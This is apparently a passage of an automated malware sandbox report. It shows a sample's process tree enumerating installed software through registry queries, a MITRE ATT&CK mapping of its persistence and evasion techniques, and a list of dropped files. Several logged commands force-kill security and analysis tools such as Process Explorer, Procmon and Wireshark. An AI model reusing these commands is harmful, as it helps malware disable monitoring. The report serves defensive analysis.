                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:488
                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:2040
                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:3700
                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:4004
                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:2040
                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:2152
                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:3516
                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:4116
                                                                                                                                                                                                                                      • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                        PID:4128
                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:4188
                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:4236
                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:4256
                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:4276
                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:4312
                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:4332
                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:4352
                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:4388
                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:4408
                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:4428
                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:4464
                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:4484
                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:4504
                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:4540
                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:4560
                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:4580
                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:4616
                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:4636
                                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:4656
                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:4692
                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:4712
                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:4732
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:4768
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:4788
                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:4808
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:4844
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:4864
                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:4884
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:4944
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:4980
                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                                    PID:4916
                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:5004
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                          PID:5052
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:5076
                                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:5092
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:4112
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:4140
                                                                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:400
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:4000
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:3704
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:3336
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:3608
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:2772
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:1372
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:3880
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                    PID:3708
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:1884
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:3700
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:3964
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                        PID:724
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                        PID:2480
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                        PID:3380
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                        PID:2416
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                        PID:4256
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                        PID:4396
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                        PID:4544

                                                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                                                                                                                    Modify Existing Service

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1031

                                                                                                                                                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                                                    T1060

                                                                                                                                                                                                                                                                                                                                    Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1158

                                                                                                                                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                                                                                                    T1112

                                                                                                                                                                                                                                                                                                                                    Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1089

                                                                                                                                                                                                                                                                                                                                    Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1158

                                                                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\.ntusernt.ini
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\oWsdf\Desktop.ini
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\oWsdf\MIJPw.class
                                                                                                                                                                                                                                                                                                                                    • \Users\Admin\AppData\Local\Temp\tnlgdsNVAh6797139551848470080.xml
                                                                                                                                                                                                                                                                                                                                    • memory/400-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/484-111-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/488-187-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/488-165-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/496-61-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/496-172-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/496-186-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/572-62-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/572-134-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/620-145-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/620-158-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/668-49-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/668-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/720-82-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/724-247-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/724-153-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/732-154-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/752-71-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/948-72-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/948-124-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1004-84-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1004-103-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1236-81-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1244-78-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1372-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1400-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1404-162-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1404-91-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1472-64-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1480-168-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1708-133-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1716-142-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1752-110-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1752-128-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1776-166-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1808-130-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1808-96-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1816-90-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1816-126-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1820-48-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/1884-244-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2036-123-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2040-191-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2040-188-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2124-161-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2124-98-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2144-101-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2144-139-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2152-192-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2252-106-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2296-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2300-180-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2304-109-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2348-75-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2372-113-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2392-173-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2392-141-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2396-55-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2408-74-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2416-250-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2424-117-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2468-70-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2480-248-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2484-107-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2656-115-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2764-127-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2764-156-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2772-105-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2772-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2788-57-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2788-108-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2884-58-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2936-85-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2976-179-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/2976-89-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3028-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3032-94-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3048-181-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3052-144-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3064-160-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3088-97-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                    • memory/3096-136-0x0000000000000000-mapping.dmp
